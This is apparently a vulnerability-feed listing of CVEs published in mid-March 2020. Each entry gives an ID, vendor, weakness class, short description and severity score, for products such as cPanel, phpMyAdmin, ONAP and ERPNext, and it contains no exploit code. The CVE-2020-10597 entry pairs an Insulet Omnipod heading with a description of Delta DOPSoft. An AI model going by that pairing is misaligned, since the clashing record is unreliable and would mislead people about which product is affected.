2020-03-18 CVE-2019-12123 Onap OS Command Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDNC before Dublin.

6.5
2020-03-18 CVE-2019-12113 Onap OS Command Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDNC before Dublin.

6.5
2020-03-18 CVE-2020-8468 Trendmicro Download of Code Without Integrity Check vulnerability in Trendmicro Apex One, Officescan and Worry-Free Business Security

Trend Micro Apex One (2019), OfficeScan XG and Worry-Free Business Security (9.0, 9.5, 10.0) agents are affected by a content validation escape vulnerability which could allow an attacker to manipulate certain agent client components.

6.5
2020-03-18 CVE-2020-8467 Trendmicro Unspecified vulnerability in Trendmicro Apex ONE and Officescan

A migration tool component of Trend Micro Apex One (2019) and OfficeScan XG contains a vulnerability which could allow remote attackers to execute arbitrary code on affected installations (RCE).

6.5
2020-03-17 CVE-2019-20492 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows authentication bypass because of misparsing of the format of the password file (SEC-516).

6.5
2020-03-17 CVE-2019-20490 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows authentication bypass because webmail usernames are processed inconsistently (SEC-499).

6.5
2020-03-17 CVE-2019-20453 Pydio Deserialization of Untrusted Data vulnerability in Pydio

A problem was found in Pydio Core before 8.2.4 and Pydio Enterprise before 8.2.4.

6.5
2020-03-17 CVE-2019-20452 Pydio Deserialization of Untrusted Data vulnerability in Pydio

A problem was found in Pydio Core before 8.2.4 and Pydio Enterprise before 8.2.4.

6.5
2020-03-16 CVE-2019-19538 Sangoma Unspecified vulnerability in Sangoma Freepbx

In Sangoma FreePBX 13 through 15 and sysadmin (aka System Admin) 13.0.92 through 15.0.13.6 modules have a Remote Command Execution vulnerability that results in Privilege Escalation.

6.5
2020-03-16 CVE-2020-9471 Umbraco Unrestricted Upload of File With Dangerous Type vulnerability in Umbraco CMS 8.5.3

Umbraco Cloud 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Packages functionality.

6.5
2020-03-16 CVE-2019-19937 Jfrog Improper Input Validation vulnerability in Jfrog Artifactory

In JFrog Artifactory before 6.18, it is not possible to restrict either system or repository imports by any admin user in the enterprise, which can lead to "undesirable results."

6.5
2020-03-16 CVE-2020-5844 Artica Unrestricted Upload of File With Dangerous Type vulnerability in Artica Pandora FMS 7.0Ng

index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location.

6.5
2020-03-16 CVE-2020-10239 Joomla Missing Authorization vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

6.5
2020-03-16 CVE-2020-10557 Atutor Unrestricted Upload of File With Dangerous Type vulnerability in Atutor Acontent

An issue was discovered in AContent through 1.4.

6.5
2020-03-18 CVE-2019-12131 Onap Authentication Bypass BY Spoofing vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was detected in ONAP APPC through Dublin and SDC through Dublin.

6.4
2020-03-18 CVE-2019-12124 Onap Unspecified vulnerability in Onap Open Network Automation Platform

An issue was discovered in ONAP APPC before Dublin.

6.4
2020-03-17 CVE-2020-10122 Cpanel Improper Input Validation vulnerability in Cpanel

cPanel before 84.0.20 allows a webmail or demo account to delete arbitrary files (SEC-547).

6.4
2020-03-17 CVE-2020-10118 Cpanel Unspecified vulnerability in Cpanel

cPanel before 84.0.20 allows a demo account to modify files via Branding API calls (SEC-543).

6.4
2020-03-17 CVE-2020-10117 Cpanel Incorrect Authorization vulnerability in Cpanel

cPanel before 84.0.20 mishandles enforcement of demo checks in the Market UAPI namespace (SEC-542).

6.4
2020-03-16 CVE-2019-18917 HP Improper Restriction of Excessive Authentication Attempts vulnerability in HP products

A potential security vulnerability has been identified for certain HP Printers and All-in-Ones that would allow bypassing account lockout.

6.4
2020-03-16 CVE-2019-14887 Redhat Inadequate Encryption Strength vulnerability in Redhat products

A flaw was found when an OpenSSL security provider is used with Wildfly, the 'enabled-protocols' value in the Wildfly configuration isn't honored.

6.4
2020-03-22 CVE-2020-10802 Phpmyadmin
Debian
SQL Injection vulnerability in multiple products

In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability has been discovered where certain parameters are not properly escaped when generating certain queries for search actions in libraries/classes/Controllers/Table/TableSearchController.php.

6.0
2020-03-22 CVE-2020-10804 Phpmyadmin SQL Injection vulnerability in PHPmyadmin

In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was found in retrieval of the current username (in libraries/classes/Server/Privileges.php and libraries/classes/UserPassword.php).

6.0
2020-03-19 CVE-2020-7006 Systech Cross-Site Scripting vulnerability in Systech Nds-5000 Firmware and Nds/5008Rm Firmware

Systech Corporation NDS-5000 Terminal Server, NDS/5008 (8 Port, RJ45), firmware Version 02D.30.

6.0
2020-03-20 CVE-2019-19484 Centreon Open Redirect vulnerability in Centreon

Open redirect via parameter ‘p’ in login.php in Centreon (19.04.4 and below) allows an attacker to craft a payload and execute unintended behavior.

5.8
2020-03-18 CVE-2019-14882 Moodle Open Redirect vulnerability in Moodle

A vulnerability was found in Moodle 3.7 to 3.7.3, 3.6 to 3.6.7, 3.5 to 3.5.9 and earlier where an open redirect existed in the Lesson edit page.

5.8
2020-03-16 CVE-2019-19610 Halvotec Session Fixation vulnerability in Halvotec Raquest 10.23.10801.0

An issue was discovered in Halvotec RaQuest 10.23.10801.0.

5.8
2020-03-16 CVE-2019-19135 Opcfoundation Insufficiently Protected Credentials vulnerability in Opcfoundation Netstandard.Opc.Ua and Ua-.Netstandard

In OPC Foundation OPC UA .NET Standard codebase 1.4.357.28, servers do not create sufficiently random numbers in OPCFoundation.NetStandard.Opc.Ua before 1.4.359.31, which allows man in the middle attackers to reuse encrypted user credentials sent over the network.

5.8
2020-03-16 CVE-2020-5546 Mitsubishielectric Argument Injection OR Modification vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows an attacker on the same network segment to stop the network functions or execute malware via a specially crafted packet.

5.8
2020-03-20 CVE-2020-8134 Ghost Server-Side Request Forgery (SSRF) vulnerability in Ghost

Server-side request forgery (SSRF) vulnerability in Ghost CMS < 3.10.0 allows an attacker to scan local or external network or otherwise interact with internal systems.

5.5
2020-03-19 CVE-2019-16064 Netsas Path Traversal vulnerability in Netsas Enigma Network Management Solution

NETSAS Enigma NMS 65.0.0 and prior suffers from a directory traversal vulnerability that can allow an authenticated user to access files and directories stored outside of the web root folder.

5.5
2020-03-16 CVE-2019-20491 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows attackers to leverage virtual mail accounts in order to bypass account suspensions (SEC-508).

5.5
2020-03-16 CVE-2019-19821 Combodo Cross-Site Scripting vulnerability in Combodo Itop

A post-authentication privilege escalation in the web application of Combodo iTop allows regular authenticated users to access information and modify information with administrative privileges by not following the HTTP Location header in server responses.

5.5
2020-03-22 CVE-2020-10807 Mitre Missing Authentication FOR Critical Function vulnerability in Mitre Caldera

auth_svc in Caldera before 2.6.5 allows authentication bypass (for REST API requests) via a forged "localhost" string in the HTTP Host header.

5.0
2020-03-21 CVE-2019-18936 Bloq Uncontrolled Recursion vulnerability in Bloq Univalue

UniValue::read() in UniValue before 1.0.5 allow attackers to cause a denial of service (the class internal data reaches an inconsistent state) via input data that triggers an error.

5.0
2020-03-21 CVE-2019-17185 Freeradius Improper Input Validation vulnerability in Freeradius

In FreeRADIUS 3.0.x before 3.0.20, the EAP-pwd module used a global OpenSSL BN_CTX instance to handle all handshakes.

5.0
2020-03-20 CVE-2019-16528 Mediawiki Information Exposure vulnerability in Mediawiki Abusefilter 1.32/1.33

An issue was discovered in the AbuseFilter extension for MediaWiki.

5.0
2020-03-20 CVE-2020-8136 Fastify Resource Exhaustion vulnerability in Fastify Fastify-Multipart

Prototype pollution vulnerability in fastify-multipart < 1.0.5 allows an attacker to crash fastify applications parsing multipart requests by sending a specially crafted request.

5.0
2020-03-20 CVE-2020-9425 Rconfig Insufficiently Protected Credentials vulnerability in Rconfig

An issue was discovered in includes/head.inc.php in rConfig before 3.9.4.

5.0
2020-03-20 CVE-2020-10792 IT Novum Incorrect Default Permissions vulnerability in It-Novum Openitcockpit

openITCOCKPIT through 3.7.2 allows remote attackers to configure the self::DEVELOPMENT or self::STAGING option by placing a hostname containing "dev" or "staging" in the HTTP Host header.

5.0
2020-03-20 CVE-2019-19324 Xmidt Always-Incorrect Control Flow Implementation vulnerability in Xmidt Cjwt 1.0.1

Xmidt cjwt through 1.0.1 before 2019-11-25 maps unsupported algorithms to alg=none, which sometimes leads to untrusted accidental JWT acceptance.

5.0
2020-03-20 CVE-2019-15075 Inextrix USE of Cryptographically Weak Pseudo-Random Number Generator (Prng) vulnerability in Inextrix Astpp

An issue was discovered in iNextrix ASTPP before 4.0.1.

5.0
2020-03-20 CVE-2019-14855 Gnupg
Fedoraproject
USE of A Broken OR Risky Cryptographic Algorithm vulnerability in multiple products

A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm.

5.0
2020-03-20 CVE-2019-18785 Suitecrm Insufficiently Protected Credentials vulnerability in Suitecrm

SuiteCRM 7.10.x prior to 7.10.21 and 7.11.x prior to 7.11.9 mishandles API access tokens and credentials.

5.0
2020-03-20 CVE-2019-18782 Salesagility Unspecified vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x prior to 7.10.21 and 7.11.x prior to 7.11.9 does not correctly implement the .htaccess protection mechanism.

5.0
2020-03-20 CVE-2018-20333 Asus Information Exposure vulnerability in Asus Asuswrt 3.0.0.4.384.20308

An issue was discovered in ASUSWRT 3.0.0.4.384.20308.

5.0
2020-03-20 CVE-2019-16108 Phpbb Code Injection vulnerability in PHPbb 3.2.7

phpBB 3.2.7 allows adding an arbitrary Cascading Style Sheets (CSS) token sequence to a page through BBCode.

5.0
2020-03-19 CVE-2020-10669 Canon Improper Authentication vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to authentication bypass on the page /home.jsp.

5.0
2020-03-19 CVE-2019-16529 Mediawiki Unspecified vulnerability in Mediawiki Checkuser

An issue was discovered in the CheckUser extension through 1.35.0 for MediaWiki.

5.0
2020-03-19 CVE-2019-16063 Netsas Missing Encryption of Sensitive Data vulnerability in Netsas Enigma Network Management Solution

NETSAS Enigma NMS 65.0.0 and prior does not encrypt sensitive data rendered within web pages.

5.0
2020-03-19 CVE-2019-16067 Netsas Cleartext Transmission of Sensitive Information vulnerability in Netsas Enigma Network Management Solution

NETSAS Enigma NMS 65.0.0 and prior utilises basic authentication over HTTP for enforcing access control to the web application.

5.0
2020-03-19 CVE-2019-15656 D Link Cleartext Storage of Sensitive Information vulnerability in D-Link Dsl-2875Al Firmware and Dsl-2877Al Firmware

D-Link DSL-2875AL and DSL-2877AL devices through 1.00.05 are prone to information disclosure via a simple crafted request to index.asp on the web management server because of username_v and password_v variables.

5.0
2020-03-19 CVE-2019-15655 D Link Insufficiently Protected Credentials vulnerability in D-Link Dsl-2875Al Firmware

D-Link DSL-2875AL devices through 1.00.05 are prone to password disclosure via a simple crafted /romfile.cfg request to the web management server.

5.0
2020-03-19 CVE-2019-15654 Comba Insufficiently Protected Credentials vulnerability in Comba Ap2600-I - A02 - 0202N00Pd2 Firmware

Comba AC2400 devices are prone to password disclosure via a simple crafted /09/business/upgrade/upcfgAction.php?download=true request to the web management server.

5.0
2020-03-19 CVE-2019-15653 Comba Insufficiently Protected Credentials vulnerability in Comba Ap2600-I - A02 - 0202N00Pd2 Firmware

Comba AP2600-I devices through A02,0202N00PD2 are prone to password disclosure via an insecure authentication mechanism.

5.0
2020-03-19 CVE-2020-10675 Jsonparser Project Infinite Loop vulnerability in Jsonparser Project Jsonparser 20191204

The Library API in buger jsonparser through 2019-12-04 allows attackers to cause a denial of service (infinite loop) via a Delete call.

5.0
2020-03-18 CVE-2019-3762 Dell Improper Certificate Validation vulnerability in Dell products

Data Protection Central versions 1.0, 1.0.1, 18.1, 18.2, and 19.1 contains an Improper Certificate Chain of Trust Vulnerability.

5.0
2020-03-18 CVE-2019-20529 Frappe Information Exposure vulnerability in Frappe 11.0.0/12.0.0

In core/doctype/prepared_report/prepared_report.py in Frappe 11 and 12, data files generated with Prepared Report were being stored as public files (no authentication is required to access; having a link is sufficient) instead of private files.

5.0
2020-03-18 CVE-2019-12121 Onap Missing Encryption of Sensitive Data vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was detected in ONAP Portal through Dublin.

5.0
2020-03-18 CVE-2020-9326 Beyondtrust Improper Input Validation vulnerability in Beyondtrust Privilege Management FOR Windows and mac

BeyondTrust Privilege Management for Windows and Mac (aka PMWM; formerly Avecto Defendpoint) 5.1 through 5.5 before 5.5 SR1 mishandles command-line arguments with PowerShell .ps1 file extensions present, leading to a DefendpointService.exe crash.

5.0
2020-03-18 CVE-2019-10682 Django Nopassword Project Insufficiently Protected Credentials vulnerability in Django-Nopassword Project Django-Nopassword

django-nopassword before 5.0.0 stores cleartext secrets in the database.

5.0
2020-03-18 CVE-2020-9325 Aquaforest Improper Input Validation vulnerability in Aquaforest Tiff Server 4.0

Aquaforest TIFF Server 4.0 allows Unauthenticated Arbitrary File Download.

5.0
2020-03-18 CVE-2020-9324 Aquaforest Insufficiently Protected Credentials vulnerability in Aquaforest Tiff Server 4.0

Aquaforest TIFF Server 4.0 allows Unauthenticated SMB Hash Capture via UNC.

5.0
2020-03-18 CVE-2020-9323 Aquaforest Information Exposure vulnerability in Aquaforest Tiff Server 4.0

Aquaforest TIFF Server 4.0 allows Unauthenticated File and Directory Enumeration via tiffserver/tssp.aspx.

5.0
2020-03-18 CVE-2019-11939 Facebook Allocation of Resources Without Limits OR Throttling vulnerability in Facebook Thrift

Golang Facebook Thrift servers would not error upon receiving messages declaring containers of sizes larger than the payload.

5.0
2020-03-17 CVE-2020-10116 Cpanel Incorrect Authorization vulnerability in Cpanel

cPanel before 84.0.20 allows attackers to bypass intended restrictions on features and demo accounts via WebDisk UAPI calls (SEC-541).

5.0
2020-03-17 CVE-2018-18576 Incsub Path Traversal vulnerability in Incsub Hustle

The Hustle (aka wordpress-popup) plugin through 6.0.5 for WordPress allows Directory Traversal to obtain a directory listing via the views/admin/dashboard/ URI.

5.0
2020-03-16 CVE-2020-8787 Salesagility Improper Input Validation vulnerability in Salesagility Suitecrm

SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow for an invalid Bean ID to be submitted.

5.0
2020-03-16 CVE-2019-20191 Sync XXE vulnerability in Sync products

Oxygen XML Editor 21.1.1 allows XXE to read any file.

5.0
2020-03-16 CVE-2020-7248 Openwrt Out-Of-Bounds Write vulnerability in Openwrt

libubox in OpenWrt before 18.06.7 and 19.x before 19.07.1 has a tagged binary data JSON serialization vulnerability that may cause a stack based buffer overflow.

5.0
2020-03-16 CVE-2017-12842 Bitcoin Improper Input Validation vulnerability in Bitcoin Core

Bitcoin Core before 0.14 allows an attacker to create an ostensibly valid SPV proof for a payment to a victim who uses an SPV wallet, even if that payment did not actually occur.

5.0
2020-03-16 CVE-2020-9321 Containous Improper Certificate Validation vulnerability in Containous Traefik

configurationwatcher.go in Traefik 2.x before 2.1.4 and TraefikEE 2.0.0 mishandles the purging of certificate contents from providers before logging.

5.0
2020-03-16 CVE-2020-6582 Nagios Out-Of-Bounds Write vulnerability in Nagios Remote Plug in Executor 3.2.1

Nagios NRPE 3.2.1 has a Heap-Based Buffer Overflow, as demonstrated by interpretation of a small negative number as a large positive number during a bzero call.

5.0
2020-03-16 CVE-2020-5849 Unraid Improper Authentication vulnerability in Unraid 6.8.0

Unraid 6.8.0 allows authentication bypass.

5.0
2020-03-16 CVE-2019-19945 Openwrt Incorrect Conversion Between Numeric Types vulnerability in Openwrt

uhttpd in OpenWrt through 18.06.5 and 19.x through 19.07.0-rc2 has an integer signedness error.

5.0
2020-03-16 CVE-2020-6988 Rockwellautomation Improper Authentication vulnerability in Rockwellautomation products

Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions, MicroLogix 1100 Controller, all versions, RSLogix 500 Software v12.001 and prior, A remote, unauthenticated attacker can send a request from the RSLogix 500 software to the victim’s MicroLogix controller.

5.0
2020-03-16 CVE-2020-6984 Rockwellautomation USE of A Broken OR Risky Cryptographic Algorithm vulnerability in Rockwellautomation products

Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions, MicroLogix 1100 Controller, all versions, RSLogix 500 Software v12.001 and prior, The cryptographic function utilized to protect the password in MicroLogix is discoverable.

5.0
2020-03-16 CVE-2020-10240 Joomla Improper Input Validation vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

5.0
2020-03-16 CVE-2020-10238 Joomla Exposure of Resource TO Wrong Sphere vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

5.0
2020-03-16 CVE-2019-19942 Swisscom Improper Input Validation vulnerability in Swisscom Centro Business and Centro Grande Firmware

Missing output sanitation in Swisscom Centro Grande Centro Grande before 6.16.12, Centro Business 1.0 (ADB) before 7.10.18, and Centro Business 2.0 before 8.02.04 allows a remote attacker to perform DNS spoofing against the web interface via crafted hostnames in DHCP requests.

5.0
2020-03-16 CVE-2019-19209 Dolibarr SQL Injection vulnerability in Dolibarr

Dolibarr ERP/CRM before 10.0.3 allows SQL Injection.

5.0
2020-03-16 CVE-2018-13063 Easyappointments Missing Authorization vulnerability in Easyappointments Easy!Appointments

Easy!Appointments 1.3.0 has a Missing Authorization issue allowing retrieval of hashed passwords and salts.

5.0
2020-03-16 CVE-2018-13060 Easyappointments Improper Authentication vulnerability in Easyappointments Easy!Appointments

Easy!Appointments 1.3.0 has a Guessable CAPTCHA issue.

5.0
2020-03-16 CVE-2020-9518 Microfocus Information Exposure vulnerability in Microfocus Service Manager

Login filter can access configuration files vulnerability in Micro Focus Service Manager (Web Tier), affecting versions 9.50, 9.51, 9.52, 9.60, 9.61, 9.62.

5.0
2020-03-16 CVE-2020-9519 Microfocus Information Exposure vulnerability in Microfocus Service Manager

HTTP methods reveled in Web services vulnerability in Micro Focus Service manager (server), affecting versions 9.40, 9.41, 9.50, 9.51, 9.52, 9.60, 9.61, 9.62, 9.63.

5.0
2020-03-17 CVE-2019-20496 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows attackers to conduct arbitrary chown operations as root during log processing (SEC-532).

4.9
2020-03-20 CVE-2020-8140 Nextcloud Code Injection vulnerability in Nextcloud

A code injection in Nextcloud Desktop Client 2.6.2 for macOS allowed to load arbitrary code when starting the client with DYLD_INSERT_LIBRARIES set in the environment.

4.6
2020-03-20 CVE-2020-1796 Huawei Incorrect Authorization vulnerability in Huawei Mate 20 Firmware and Mate 30 PRO Firmware

There is an improper authorization vulnerability in several smartphones.

4.6
2020-03-20 CVE-2020-1709 Redhat Improper Privilege Management vulnerability in Redhat Openshift

A vulnerability was found in all openshift/mediawiki 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the openshift/mediawiki.

4.6
2020-03-20 CVE-2020-10597 Insulet Incorrect Authorization vulnerability in Insulet Omnipod Insulin Management System Firmware

Delta Industrial Automation DOPSoft, Version 4.00.08.15 and prior.

4.6
2020-03-20 CVE-2019-19345 Redhat Improper Privilege Management vulnerability in Redhat Openshift

A vulnerability was found in all openshift/mediawiki-apb 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the container openshift/mediawiki-apb.

4.6
2020-03-18 CVE-2019-18979 Claranova Unspecified vulnerability in Claranova Adaware Antivirus 12.6.1005.11662/12.7.1055.0

Adaware antivirus 12.6.1005.11662 and 12.7.1055.0 has a quarantine flaw that allows privilege escalation.

4.6
2020-03-16 CVE-2020-7608 Yargs Improper Input Validation vulnerability in Yargs Yargs-Parser

yargs-parser could be tricked into adding or modifying properties of Object.prototype using a "__proto__" payload.

4.6
2020-03-16 CVE-2020-3948 Vmware Improper Privilege Management vulnerability in VMWare Fusion and Workstation

Linux Guest VMs running on VMware Workstation (15.x before 15.5.2) and Fusion (11.x before 11.5.2) contain a local privilege escalation vulnerability due to improper file permissions in Cortado Thinprint.

4.6
2020-03-20 CVE-2020-1707 Redhat Improper Privilege Management vulnerability in Redhat Openshift

A vulnerability was found in all openshift/postgresql-apb 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the container openshift/postgresql-apb.

4.4
2020-03-19 CVE-2020-1705 Redhat Improper Privilege Management vulnerability in Redhat Template Service Broker Operator 4.0.0/4.2.0

A vulnerability was found in openshift/template-service-broker-operator in all 4.x.x versions prior to 4.3.0, where an insecure modification vulnerability in the /etc/passwd file was found in the openshift/template-service-broker-operator.

4.4
2020-03-18 CVE-2019-19355 Redhat Improper Privilege Management vulnerability in Redhat Openshift 4.0

An insecure modification vulnerability in the /etc/passwd file was found in the openshift/ocp-release-operator-sdk.

4.4
2020-03-18 CVE-2019-19351 Redhat Improper Privilege Management vulnerability in Redhat Openshift 3.11/4.0

An insecure modification vulnerability in the /etc/passwd file was found in the container openshift/jenkins.

4.4
2020-03-22 CVE-2020-10812 Hdfgroup Null Pointer Dereference vulnerability in Hdfgroup Hdf5

An issue was discovered in HDF5 through 1.12.0.

4.3
2020-03-22 CVE-2020-10811 Hdfgroup Out-Of-Bounds Read vulnerability in Hdfgroup Hdf5

An issue was discovered in HDF5 through 1.12.0.

4.3
2020-03-22 CVE-2020-10810 Hdfgroup Null Pointer Dereference vulnerability in Hdfgroup Hdf5

An issue was discovered in HDF5 through 1.12.0.

4.3
2020-03-22 CVE-2020-10809 Hdfgroup Out-Of-Bounds Write vulnerability in Hdfgroup Hdf5

An issue was discovered in HDF5 through 1.12.0.

4.3
2020-03-20 CVE-2019-18860 Squid Cache Injection vulnerability in Squid-Cache Squid

Squid before 4.9, when certain web browsers are used, mishandles HTML in the host (aka hostname) parameter to cachemgr.cgi.

4.3
2020-03-20 CVE-2019-13463 Quantumcloud Cross-Site Scripting vulnerability in Quantumcloud Simple Link Directory

An XSS vulnerability in qcopd-shortcode-generator.php in the Simple Link Directory plugin before 7.3.5 for WordPress allows remote attackers to inject arbitrary web script or HTML, because esc_html is not called for the "echo get_the_title()" or "echo $term->name" statement.

4.3
2020-03-20 CVE-2020-8883 Foxitsoftware Out-Of-Bounds Read vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.916.

4.3
2020-03-20 CVE-2020-8879 Foxitsoftware Out-Of-Bounds Read vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.916.

4.3
2020-03-20 CVE-2020-8877 Foxitsoftware Out-Of-Bounds Read vulnerability in Foxitsoftware Foxit Studio Photo

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.916.

4.3
2020-03-20 CVE-2019-13389 Rainloop Cross-Site Scripting vulnerability in Rainloop Webmail

RainLoop Webmail before 1.13.0 lacks XSS protection mechanisms such as xlink:href validation, the X-XSS-Protection header, and the Content-Security-Policy header.

4.3
2020-03-20 CVE-2019-10221 Redhat
Dogtagpki
Cross-Site Scripting vulnerability in multiple products

A Reflected Cross Site Scripting vulnerability was found in all pki-core 10.x.x versions, where the pki-ca module from the pki-core server.

4.3
2020-03-20 CVE-2019-10179 Redhat
Dogtagpki
Cross-Site Scripting vulnerability in multiple products

A vulnerability was found in all pki-core 10.x.x versions, where the Key Recovery Authority (KRA) Agent Service did not properly sanitize recovery request search page, enabling a Reflected Cross Site Scripting (XSS) vulnerability.

4.3
2020-03-20 CVE-2020-9345 Signotec Allocation of Resources Without Limits OR Throttling vulnerability in Signotec Signopad-Api/Web

An issue was discovered in signotec signoPAD-API/Web (formerly Websocket Pad Server) before 3.1.1 on Windows.

4.3
2020-03-20 CVE-2020-9344 Atlassian Cross-Site Scripting vulnerability in Atlassian Subversion Application Lifecycle Management

Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.

4.3
2020-03-20 CVE-2020-9343 Signotec Improper Input Validation vulnerability in Signotec Signopad-Api/Web

An issue was discovered in signotec signoPAD-API/Web (formerly Websocket Pad Server) before 3.1.1 on Windows.

4.3
2020-03-19 CVE-2019-16069 Netsas Cross-Site Scripting vulnerability in Netsas Enigma Network Management Solution

A number of stored Cross-site Scripting (XSS) vulnerabilities were identified in NETSAS Enigma NMS 65.0.0 and prior that could allow a threat actor to inject malicious code directly into the application through the SNMP protocol.

4.3
2020-03-19 CVE-2020-10670 Canon Cross-Site Scripting vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to Reflected XSS in the parameter settingId of the settingDialogContent.jsp page.

4.3
2020-03-19 CVE-2020-10668 Canon Cross-Site Scripting vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to Reflected XSS in /home.jsp.

4.3
2020-03-19 CVE-2020-10667 Canon Cross-Site Scripting vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The web application exposed by the Canon Oce Colorwave 500 4.0.0.0 printer is vulnerable to Stored XSS in /TemplateManager/indexExternalLocation.jsp.

4.3
2020-03-19 CVE-2019-15539 Mantisbt Cross-Site Scripting vulnerability in Mantisbt

The proj_doc_edit_page.php Project Documentation feature in MantisBT before 2.21.3 has a stored cross-site scripting (XSS) vulnerability, allowing execution of arbitrary code (if CSP settings permit it) after uploading an attachment with a crafted filename.

4.3
2020-03-19 CVE-2019-15124 Mediawiki Cross-Site Scripting vulnerability in Mediawiki Mobilefrontend 1.31.0/1.32.0/1.33.0

In the MobileFrontend extension for MediaWiki, XSS exists within the edit summary field of the watchlist feed.

4.3
2020-03-19 CVE-2019-20526 Igniterealtime Cross-Site Scripting vulnerability in Igniterealtime Openfire 4.4.1

Ignite Realtime Openfire 4.4.1 allows XSS via the setup/setup-datasource-standard.jsp password parameter.

4.3
2020-03-19 CVE-2019-20525 Igniterealtime Cross-Site Scripting vulnerability in Igniterealtime Openfire 4.4.1

Ignite Realtime Openfire 4.4.1 allows XSS via the setup/setup-datasource-standard.jsp driver parameter.

4.3
2020-03-19 CVE-2019-20521 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the api/ URI.

4.3
2020-03-19 CVE-2019-20520 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the api/method/ URI.

4.3
2020-03-19 CVE-2019-20519 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the user/ URI, as demonstrated by a crafted e-mail address.

4.3
2020-03-19 CVE-2019-20518 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the project/ URI.

4.3
2020-03-19 CVE-2019-20517 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the contact/ URI.

4.3
2020-03-19 CVE-2019-20516 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the blog/ URI.

4.3
2020-03-19 CVE-2019-20515 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the addresses/ URI.

4.3
2020-03-19 CVE-2019-20514 Frappe Cross-Site Scripting vulnerability in Frappe Erpnext 11.1.47

ERPNext 11.1.47 allows reflected XSS via the PATH_INFO to the address/ URI.

4.3
2020-03-19 CVE-2019-20513 EDX Cross-Site Scripting vulnerability in EDX Open EDX 20190315

Open edX Ironwood.1 allows support/certificates?user= reflected XSS.

4.3
2020-03-19 CVE-2019-16070 Netsas Cross-Site Scripting vulnerability in Netsas Enigma Network Management Solution

A number of stored Cross-site Scripting (XSS) vulnerabilities were identified in NETSAS Enigma NMS 65.0.0 and prior that could allow a threat actor to inject malicious code directly into the application through web application form inputs.

4.3
2020-03-19 CVE-2019-12416 Apache Injection vulnerability in Apache Deltaspike

we got reports for 2 injection attacks against the DeltaSpike windowhandler.js.

4.3
2020-03-19 CVE-2019-20527 Igniterealtime Cross-Site Scripting vulnerability in Igniterealtime Openfire 4.4.1

Ignite Realtime Openfire 4.4.1 allows XSS via the setup/setup-datasource-standard.jsp serverURL parameter.

4.3
2020-03-19 CVE-2019-20524 Ilch Cross-Site Scripting vulnerability in Ilch CMS 2.1.23

ilchCMS 2.1.23 allows XSS via the index.php/partner/index Banner parameter.

4.3
2020-03-19 CVE-2019-20523 Ilch Cross-Site Scripting vulnerability in Ilch CMS 2.1.23

ilchCMS 2.1.23 allows XSS via the index.php/partner/index Name parameter.

4.3
2020-03-19 CVE-2019-20522 Ilch Cross-Site Scripting vulnerability in Ilch CMS 2.1.23

ilchCMS 2.1.23 allows XSS via the index.php/partner/index Link parameter.

4.3
2020-03-19 CVE-2019-19336 Ovirt
Redhat
Cross-Site Scripting vulnerability in multiple products

